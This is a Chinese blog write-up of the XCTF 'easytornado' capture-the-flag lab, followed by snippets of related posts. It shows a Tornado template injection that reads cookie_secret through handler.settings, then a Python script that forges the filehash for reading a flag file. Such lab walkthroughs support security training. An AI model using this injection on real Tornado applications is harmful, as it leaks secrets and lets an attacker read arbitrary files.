攻防世界easytornado-tornado模板注入

最新推荐文章于 2024-04-05 15:16:42 发布
最新推荐文章于 2024-04-05 15:16:42 发布
阅读量365 收藏
点赞数
分类专栏: WEB刷题记录 攻防世界 文章标签: tornado 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuanxu8877/article/details/128079863
版权

XCTF - easytornado


本题知识点

  • ssti 注入
  • tornado模板注入
  • tornado cookie_secret获取


打开网页,发现三个txt,分别打开
flag.txt中给出提示,flag在fllllllllllllag文件中

welcome.txt中,发现有个render提示,在tornado 中render为渲染作用


hints.txt中又有提示,通过分析为filehash参数的计算方法。

通过上面三个的分析,可以得出,我们需要构建一个url为
http://61.147.171.105:59757/file?filename=/fllllllllllllag&filehash=8118900642aec29fd2e086878b1b1613
此时我们需要计算出filehash的值即可。
计算方法如下:md5(cookie_secret+md5(filename)),此时我们只需要获取cookie_secret即可。
通过题目提示和welcome.txt提示可以发现为tornado模板注入,cookie_secret获取方法如下:

render是一个类似模板的东西,可以使用不同的参数来访问网页
在tornado模板中,存在一些可以访问的快速对象,例如
{{ escape(handler.settings[“cookie”]) }}

这两个{{}}和这个字典对象也许大家就看出来了,没错就是这个handler.settings对象
handler 指向RequestHandler

而RequestHandler.settings又指向self.application.settings

所有handler.settings就指向RequestHandler.application.settings了!

大概就是说,这里面就是我们一下环境变量,我们正是从这里获取的cookie_secret
如此,我们首先要找到模板注入的参数,此时我们将


回车后发现页面跳转到一个错误信息返回的界面,我们在此处尝试注入

输入{{1}},返回值为1,此处存在注入。直接输入payload读取cookie_secret即可。

编写脚本获取filehash,

import hashlib
def get_md5(content):
    md5 = hashlib.md5()
    md5.update(content.encode('utf-8'))
    return md5.hexdigest()
filename="/fllllllllllllag"
cookie_secret="3e22a263-3d8e-4562-b868-48945ac1f5b0"
no_md5_filehash=cookie_secret+get_md5(filename)
filehash=get_md5(no_md5_filehash)
print(filehash)

输入payload获取flag
http://61.147.171.105:59757/file?filename=/fllllllllllllag&filehash=21fa07d6595f51191129893c59e427db

sean7777777
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
whisper-tornado 依赖
05-21
whisper-tornado 依赖,可用于离线环境下开发
python测验,hello-tornado.rar
05-14
python测验,hello-tornado.rar
easy_tornado复现
AsagiRiAsagi的博客
01-03 807
Easy_tornado分析 问题与解答 cookie_secret是什么? 答:根据Tornado官方文档的解释:这是settings中关于认证和安全方面的一个配置参数。 settings又是什么? 答:是一个python字典。通常用作于application的配置项。 application是什么? 答:这个问题会比较难直接回答。这需要先理解一个tornado web应用是如何工作的。 我们先看Tornado官方给的一个Hello World程序的例子: import tornado.iol
XCTF-攻防世界CTF平台-Web类——15、easytornado(SSTI服务器模板注入Tornado 框架render渲染函数、MD5加密)
Onlyone_1314的博客
12-11 2704
目录标题找到注入点查看tornado的官方文档得到cookie_secret的值计算md5值得到flag 打开题目地址: 题目描述使用了Tornado 框架,Tornado是Python的一种 Web 服务器软件框架。 有三个文件,分别查看: 提示flag所在的文件/fllllllllllllag,url中GET方式提交了2个参数:filename=/flag.txt&filehash=6d9ebcb83324409e048e0d8086173713 提示使用了render函数,由于rend
攻防世界easytornado
wangzhemvp的博客
04-05 267
可以把它理解为 tornado 模板中内置的环境配置信息名称,通过handler.settings 可以访问到环境配置的一些信息。看到 tornado 模板基本上就用 handler.settings。{{ }}有回显,一般存在模版注入。得到cookie_secret。模版注入 + tornado模板
攻防世界easytornado 附带脚本
my_name_is_sy的博客
05-23 190
easytornado 打开后显示在flag中,我们可以看到提示 /flag.txt flag in /fllllllllllllag 然后,按照提示进入页面 那么,此处暂且搁置。打开“welcome.txt”页面。 得到提示 /welcome.txt render render 然后我们再打开提示页面“hints.txt” ...
攻防世界 web进阶区 easytornado
m0_51395584的博客
06-17 417
攻防世界 web进阶区 easytornado Tornado 框架的漏洞利用
攻防世界--Web进阶--easytornado---模板注入
z2560088的博客
10-11 244
目录 信息搜集 模板注入 生成filehash 信息搜集 发现flag的位置,于是我们试试能不能访问 报错了 查看/welcome.txt 由于render({options})可以猜测有模板注入漏洞。 /hints.txt提醒md5(cookie_secret+md5(filename)) 这个应该是file的hash算法了 filename应该是/fllllllllllllag cookie_secret不清楚 模板注入...
ubuntu-python3-whisper-tornado docker镜像
最新发布
05-21
ubuntu-python3-whisper-tornado docker镜像,可下载直接使用
python的web框架的tornado和flask模块注入
qq_53099802的博客
05-19 498
tornado的render模块注入和flask注入
攻防世界 easytornado 详解
xmj818719的博客
03-28 844
Tornado框架 第一任务先找cookie_secret 没什么头绪,直接访问http://111.200.241.244:59809/file?filename=/fllllllllllllag&filehash=7bc08cbde1fe13f5898f51b5470dc21d 回想起前段时间做的py模板注入,用同样的方法试一下 还是无果 最后动用谷歌寻找框架漏洞 网上搜罗框架漏洞资料,资料大概意思是可用 handler.settings 访问配置文件 http...
[护网杯 2018]easy_tornado
yzl_007的博客
02-22 361
tornado模板注入 给到了如下一些信息 /flag.txt flag in /fllllllllllllag /welcome.txt render /hints.txt md5(cookie_secret+md5(filename)) url形如 :http://35848a5d-982a-45c9-a772-1b59e317746f.node3.buuoj.cn/file?filename=/flag.txt&filehash=32c8987c242bb2c5f0b0da175550d
攻防世界web easytornado
Zeker62的博客
09-05 165
真不easy目录提取有用信息:寻找漏洞百度,找tornado的特点:提取有用信息: 打开网站,发现有三个文件 flag.txt: 告诉了我们flag的位置 welcome.txt:告诉我们这是和render渲染函数有关,即可能存在SSTI漏洞 hints.txt: 告诉了我们某个东西的加密方式 根据经验,盲猜这是个身份验证的秘钥,看见URL后面的东西像MD5加密后的密文,所以猜测可能就是fil...
模板注入tornado_render)之[护网杯 2018]easy_tornado1
qq_58970968的博客
04-10 315
根据提供的三个文件可以知道,flag在fllllllllag目录下;根据题目tornado 还有提示render知道,这大概念是考模板注入{{}} ;然后观看URL发现,可以猜测: 这道题需要构造/file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(filename)) 当然在此之前用{{}}来注入会发现每次都会跳到error?msg 在这里构造{{1}}就会返回一个值;大可判定就是模板注入;关于rende...
漏洞复现-easy_tornado
qq_59350385的博客
07-04 270
windowsFirefoxtornado是python中的一个web应用框架。拿到题目发现有三个文件:flag.txt 发现flag在/fllllllllllllag文件里;welcome.txt render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。hints.txt filehash=md5(cookie_secret+md5(filename)) 现在filename=/fllllllllllllag,只需要知道cookie_secret的
【BUUCTF之easy_tornado
qq_40646572的博客
05-15 892
打开题目网站,发现存在三个文件,都打开看了下,在hint.txt文件中发现提示。 在flag.txt文件中也有提示flag在/fllllllllllllag文件中。 整理下思路,这道题其实关键点在于hint.txt文件中的cookie_secret值。 但考虑到题目名中包含tornado这个关键词,百度下发现这是一个python的web框架,搜索下是否存在可以读取配置文件的漏洞,发现这个框架存在可以读取配置文件的漏洞。 想到还有一个welcome.txt文件,上面提示到render,渲染。想到ss..
buuctf easy-tornado(cookie_secret)
qq_54929891的博客
02-27 1631
进入url可以看到三个超链接 都分别点开看看 并且发现url中传输了两个参数,一个是filename,另一个是filehash,在flag.txt中将filename改为提示的/fllllllllllllag试一试 看来拿到flag的关键就在于解出filehash是什么,根据连接的提示,我们可以猜想filehash=md5(cookie_secret+md5(filename)),filename我们知道就是/fllllllllllllag,但是cookie _secret我们就不.
Tornado模板
weixin_33726943的博客
06-15 161
--------------------静态文件--------------------1、static_path:通过向web.Application类的构造函数传递一个名为static_path的参数来告诉Tornado从文件系统的一个特定位置提供静态文件app = tornado.web.Application([(r'/', IndexHandler)],static_path=os.pa...
tornado模板
Rick的博客
11-18 752
tornado模板模板 模板使用,特别之处就是在Application多了个指定模板路径的参数,告诉Tornado在哪里寻找模板文件 app = tornado.web.Application( handlers=[(r'/', IndexHandler), (r'/poem', PoemPageHandler)], template_path=os.path
python3-tornado
01-30
Python3-tornado是一个基于Python的Web框架,它使用非阻塞的I/O模型,可以处理高并发的网络请求。它的特点是轻量级、高效、易用,适用于开发高性能的Web应用和实时应用程序。 以下是一个简单的Python3-tornado示例...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值